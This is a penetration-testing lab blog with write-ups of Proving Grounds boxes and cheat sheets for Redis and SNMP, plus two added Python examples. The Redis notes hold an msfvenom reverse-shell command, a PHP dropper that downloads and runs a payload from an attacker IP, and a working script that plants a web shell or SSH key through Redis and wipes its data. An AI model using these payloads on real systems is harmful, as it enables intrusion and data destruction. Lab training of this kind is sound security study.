Posts

Showing posts from August, 2022

PG Nibbles

I look into vsftpd 3.0.3 first. Only a DDoS vulnerability exists. Anonymous login is not working. I move on to port 80. I don't see anything interesting. ffuf is not showing anything. It must be the PostgreSQL server. I try psql and it does not work. It does not work because I need to set the port! The PostgreSQL server is sitting on port 5437. The default port is 5432. The default username/password is postgres/postgres. I don't know much about Postgres so I go on HackTricks. https://book.hacktricks.xyz/network-services-pentesting/pentesting-postgresql The three Metasploit modules stand out. I read the /etc/passwd file. wilson is a user. I try to read /home/wilson/.ssh/authorized_keys and /home/wilson/.ssh/id_rsa. He does not have either. Reading doesn't help. The /bin/bash on postgres is interesting to me. I got stuck on this part for 1 hour. I use my favorite port 443 for reverse shells. Most firewalls allow ports 80 and 443. In Offsec fashion, they ...

PG Helpdesk

The first thing that catches my eye is Samba and Tomcat. I go after Samba first. I exploited MS09-050 (CVE-2009-3103) a few hours ago on the PG Internal box. I try the same Metasploit exploit again. It does not work. I try to list out the shares using smbclient -L \\192.168.232.43 and smbmap -H 192.168.232.43 -r. It does not work. I abandon Samba and go after the Tomcat instance next. The app looks very retro 90s. This gives me high hopes this is the way in. I google default creds. I copy/paste administrator into the username and password box. I am in. I navigate for about 10 minutes and then see the "About" link. I can get a version out of that. The version is "ManageEngine ServiceDesk 7.6.0 build 7601". I google that and put "exploit" at the end. I read through the first GitHub return and decide to try.

⭐ Solved In Under An Hour ⭐

Lessons Learned
First time seeing ManageEngine ServiceDesk 7.6.0
Nothing else learne...

PG Internal

Unrelated

⭐ Solved In Under Two Hours ⭐

A few road blocks. Nmap did not pick up Samba on the first run. RPC and "5357/tcp wsdapi" sidetracked me. Reran nmap after a while and saw Samba. I found rpcdump.py, which could be useful on future boxes.

Actions Taken
MS09-050 added to "This has worked before": https://github.com/ASzampiasSWD/OSCP/tree/master/SMB

Need to Do
EternalBlue example no longer works. Relearn how to use this entire library: https://github.com/worawit/MS17-010
Exploit using worawit EternalBlue on this box.

Lessons Learned
Nmap --script vuln-samba-* did not pick up MS09-050 for this box. I found out by googling. If you see a 2008 R2 or Vista box (and EternalBlue is not working), try this instead.

PG Twiggy

Script that works: https://gist.github.com/momenbasel/b883d039bb28b18ccd7efe92a91d98f8

⭐ Solved In Under an Hour ⭐

Good Job on:
Test multiple ports with script. 4505, 8000 didn't work. 4506 did.
Fast at solving box.
Slowed down on Enumeration.

Lessons Learned
Familiarity and recognition with SaltStack if it shows up again.

Redis Jutsus

1. redis-cli
sudo apt-get install redis-tools
redis-cli -h 192.168.232.69
Use redis-cli to log in to a Redis server. Once connected, INFO server prints the version, which decides which of the tricks below to try.

2. Redis 4.X.X/5.X.X unauthenticated RCE
python3 redis-rogue-server.py --rhost 192.168.232.69 --rport 6379 --lhost 192.168.49.232 --lport 6379
If the version starts with 4 or 5 and the Redis server is unauthenticated, try redis-rogue-server first. It abuses replication (SLAVEOF pointing at the attacker's rogue master) to push a malicious module onto the target, then loads it with MODULE LOAD.
https://github.com/n0b0dyCN/redis-rogue-server

3. Write access to a web directory
Add a PHP file to the web directory using Redis (CONFIG SET dir and dbfilename, SET, SAVE). Payload that pulls down and runs a reverse shell:
msfvenom -p linux/x86/shell_reverse_tcp LHOST=10.6.49.65 LPORT=443 -f elf -o shell.elf
<?php exec('wget http://10.6.49.65/shell.elf'); exec('chmod +x shell.elf'); exec('./shell.elf'); ?>
Serve shell.elf from 10.6.49.65 and have a listener on 443 before requesting the PHP file.

4. SSH keys
You can add an SSH key if you have write access to a directory. Sometimes /home/redis can exist. Pad the key with newlines on both sides so it lands on a line of its own inside the RDB dump.
More info here: https://book.hacktricks.xyz/network-services-pentesting/6379-pentesting-redis

PG Wombo

What a troll box. I for sure thought the vulnerable way in would be NodeBB on port 8080. I redid the nmap and saw Redis and MongoDB ports were open.
https://github.com/n0b0dyCN/redis-rogue-server
https://book.hacktricks.xyz/network-services-pentesting/6379-pentesting-redis

Lessons Learned:
You can crash Redis by running exploits over and over again. Revert the machine.
If Redis starts with 4.X.X or 5.X.X, run RedisRogueServer. Needs to be unauthenticated too.
There is another Redis on TryHackMe. I have the "4.X.X, 5.X.X unauth" trick. I saw in HackTricks 4 other interesting ways to exploit Redis. One was writing your SSH keys to a file and logging in. Another was making a file and putting it in a web directory.
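Added example, not code from the blog, serving items 3 and 4 of the Redis Jutsus post and the Wombo lessons above: the exact Redis command sequence that turns the RDB snapshot into a PHP dropper in the web root or an authorized_keys file, encoded as RESP and sent with nothing but the standard library. Everything target-specific is assumed rather than taken from the page: 192.168.232.69:6379 answering without AUTH, a web root of /var/www/html, an existing /home/redis/.ssh, a redis process able to write those directories, and CONFIG/SAVE not renamed or disabled. The SSH key is a constructed placeholder.

```python
"""Added example, not code from the blog: the raw Redis command sequence behind
"write a PHP file into the web root" and "write an SSH key" from the Redis Jutsus
post and the Wombo lessons, sent over RESP with only the standard library.

Assumed (not from the page): target 192.168.232.69:6379 answers without AUTH,
the web root is /var/www/html, /home/redis/.ssh exists, the redis process can
write those directories, and CONFIG and SAVE have not been renamed or disabled.
"""
import socket

# Payload from the post: a PHP dropper that fetches and runs the msfvenom ELF.
PHP_DROPPER = ("<?php exec('wget http://10.6.49.65/shell.elf'); "
               "exec('chmod +x shell.elf'); exec('./shell.elf'); ?>")

# Constructed placeholder key for the example, not a real credential.
SSH_PUBKEY = "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDexampleexample attacker@kali"


def resp_encode(args):
    """Encode one command as a RESP array of bulk strings (what redis-cli sends)."""
    parts = [b"*%d\r\n" % len(args)]
    for arg in args:
        raw = arg if isinstance(arg, bytes) else str(arg).encode()
        parts.append(b"$%d\r\n%s\r\n" % (len(raw), raw))
    return b"".join(parts)


def write_file_plan(directory, filename, payload, key="x"):
    """Commands that turn the RDB snapshot into a file of our choosing.

    FLUSHALL empties the keyspace so the dump holds little besides our value
    (destructive: it wipes the target's data), CONFIG SET dir/dbfilename aim
    the snapshot at the wanted path, and SAVE writes it synchronously.
    """
    return [
        ["FLUSHALL"],
        ["CONFIG", "SET", "dir", directory],
        ["CONFIG", "SET", "dbfilename", filename],
        ["SET", key, payload],
        ["SAVE"],
    ]


def ssh_key_payload(pubkey):
    """Surround the key with blank lines: the RDB header and trailer are binary,
    and sshd skips authorized_keys lines it cannot parse, so the key only has
    to sit on a line of its own."""
    return "\n\n" + pubkey + "\n\n"


def read_simple_reply(sock):
    """Read one reply line: every command in the plan answers +OK or -ERR ..."""
    data = b""
    while not data.endswith(b"\r\n"):
        chunk = sock.recv(4096)
        if not chunk:
            break
        data += chunk
    return data.decode(errors="replace").strip()


def run_plan(host, port, plan, timeout=5):
    """Send the plan and collect replies; stop at the first error reply
    (typically -NOAUTH, or -ERR unknown command when CONFIG is disabled)."""
    replies = []
    with socket.create_connection((host, port), timeout=timeout) as sock:
        for cmd in plan:
            sock.sendall(resp_encode(cmd))
            reply = read_simple_reply(sock)
            replies.append(reply)
            if reply.startswith("-"):
                break
    return replies


if __name__ == "__main__":
    web_shell = write_file_plan("/var/www/html", "shell.php", PHP_DROPPER)
    ssh_login = write_file_plan("/home/redis/.ssh", "authorized_keys",
                                ssh_key_payload(SSH_PUBKEY))
    for cmd in web_shell + ssh_login:
        print(resp_encode(cmd).decode())  # what goes on the wire
    # Against a live lab target:
    # print(run_plan("192.168.232.69", 6379, web_shell))
```

After the web-root plan succeeds, request http://target/shell.php with shell.elf served from 10.6.49.65 and a listener on 443; after the key plan, ssh -i the matching private key as redis. The FLUSHALL step wipes whatever the target stored, and a failed or repeated SAVE into a bad path is one way to end up with the crashed Redis the Wombo post reverts.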

SNMP Jutsus

SNMP = Simple Network Management Protocol. Usually UDP port 161, so it only shows up in a UDP scan (nmap -sU); some hosts also bind it on TCP 161, which is when it appears in a plain TCP scan. The default community string is "public". snmp-check defaults to port 161 and the "public" community:
snmp-check 192.168.232.42
The most useful part of the output is the running-process list (HOST-RESOURCES-MIB hrSWRunName). If totally stuck, start copying/pasting the unusual program names into Google. On the ClamAV box the process list shows clamav-milter running in black-hole mode; that is the vulnerability, reached through the Sendmail service on port 25: https://www.exploit-db.com/exploits/16924

PG: ClamAV

The box name is "ClamAV". So it seems ClamAV is the next step. This is the first time I've seen SNMP be helpful for me. https://www.exploit-db.com/exploits/16924

Lessons Learned:
Even if a program doesn't make sense at all, it can be piggybacking off an open port service. ClamAV -> SendMail 25
Use snmp-check 192.168.232.42.
Make pages for SMTP and SNMP enumeration.
Used 2/3 hints. ~3 hours with hints. Need better enumeration.
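Added example, not code from the blog, for the SNMP Jutsus post and the ClamAV lessons above: parse the hrSWRun process table that snmpwalk returns and list the programs outside a baseline, which is the "copy unusual programs into Google" step both posts describe. Assumed rather than taken from the page: net-snmp output as printed by snmpwalk -v2c -c public 192.168.232.42 1.3.6.1.2.1.25.4.2.1 (with MIB names resolved or as bare numeric OIDs; both are handled), a hypothetical BASELINE of processes not worth a search, and SAMPLE lines constructed for the example (the names echo what the ClamAV post found but were not captured from the box).

```python
"""Added example, not code from the blog: parse the running-process table that
SNMP exposes (HOST-RESOURCES-MIB hrSWRun, OID 1.3.6.1.2.1.25.4.2.1) and list the
programs that are not ordinary, which is the "copy unusual programs into Google"
step of the SNMP Jutsus post and the ClamAV box.

Assumed (not from the page): net-snmp output, e.g. from
    snmpwalk -v2c -c public 192.168.232.42 1.3.6.1.2.1.25.4.2.1
with MIB names resolved or as bare numeric OIDs; both are handled. SAMPLE is
constructed for the example, not captured from the box, and BASELINE is a
hypothetical list of processes not worth a search.
"""
import re

# hrSWRunEntry columns: .2 name, .4 path, .5 parameters
COLUMN_BY_NUMBER = {"2": "name", "4": "path", "5": "params"}
COLUMN_BY_NAME = {"Name": "name", "Path": "path", "Parameters": "params"}

BASELINE = {"init", "kthreadd", "ksoftirqd", "cron", "rsyslogd", "snmpd",
            "sshd", "bash", "getty"}

# Constructed walk output mixing the symbolic and numeric formats.
SAMPLE = """\
HOST-RESOURCES-MIB::hrSWRunName.1 = STRING: "init"
HOST-RESOURCES-MIB::hrSWRunName.1017 = STRING: "snmpd"
HOST-RESOURCES-MIB::hrSWRunName.1105 = STRING: "sendmail-mta"
HOST-RESOURCES-MIB::hrSWRunName.1109 = STRING: "clamav-milter"
HOST-RESOURCES-MIB::hrSWRunName.1112 = STRING: "clamd"
HOST-RESOURCES-MIB::hrSWRunPath.1105 = STRING: "sendmail: MTA: accepting connections"
HOST-RESOURCES-MIB::hrSWRunPath.1109 = STRING: "/usr/sbin/clamav-milter"
HOST-RESOURCES-MIB::hrSWRunParameters.1109 = STRING: "--black-hole-mode -l -o -q"
iso.3.6.1.2.1.25.4.2.1.2.1200 = STRING: "sshd"
iso.3.6.1.2.1.25.4.2.1.4.1200 = STRING: "/usr/sbin/sshd"
iso.3.6.1.2.1.25.4.2.1.5.1200 = ""
"""


def classify_oid(oid):
    """Map an OID (symbolic or numeric) to (column, pid), or (None, None)."""
    m = re.match(r"^HOST-RESOURCES-MIB::hrSWRun(Name|Path|Parameters)\.(\d+)$", oid)
    if m:
        return COLUMN_BY_NAME[m.group(1)], int(m.group(2))
    m = re.match(r"^(?:iso|\.?1)\.3\.6\.1\.2\.1\.25\.4\.2\.1\.(\d+)\.(\d+)$", oid)
    if m and m.group(1) in COLUMN_BY_NUMBER:
        return COLUMN_BY_NUMBER[m.group(1)], int(m.group(2))
    return None, None


def clean_value(raw):
    """Drop the 'STRING:' type tag and surrounding quotes that snmpwalk prints."""
    raw = re.sub(r"^[A-Za-z-]+:\s*", "", raw.strip())
    return raw.strip().strip('"')


def parse_snmpwalk(text):
    """Return {pid: {"name": ..., "path": ..., "params": ...}} from walk output."""
    procs = {}
    for line in text.splitlines():
        m = re.match(r"^(\S+)\s*=\s*(.*)$", line.strip())
        if not m:
            continue
        column, pid = classify_oid(m.group(1))
        if column is None:
            continue
        procs.setdefault(pid, {})[column] = clean_value(m.group(2))
    return procs


def unusual_programs(procs, baseline=BASELINE):
    """Unique (name, path, params) triples for processes outside the baseline,
    sorted so a program appears once even when it runs under many PIDs."""
    rows = set()
    for proc in procs.values():
        name = proc.get("name", "")
        if name and name not in baseline:
            rows.add((name, proc.get("path", ""), proc.get("params", "")))
    return sorted(rows)


if __name__ == "__main__":
    for name, path, params in unusual_programs(parse_snmpwalk(SAMPLE)):
        print(f"{name:16} {path} {params}".rstrip())
```

The parameters column is the part worth reading closely: a flag such as the milter's black-hole mode is what points from a harmless-looking antivirus daemon to the Sendmail service on port 25 that actually gets exploited.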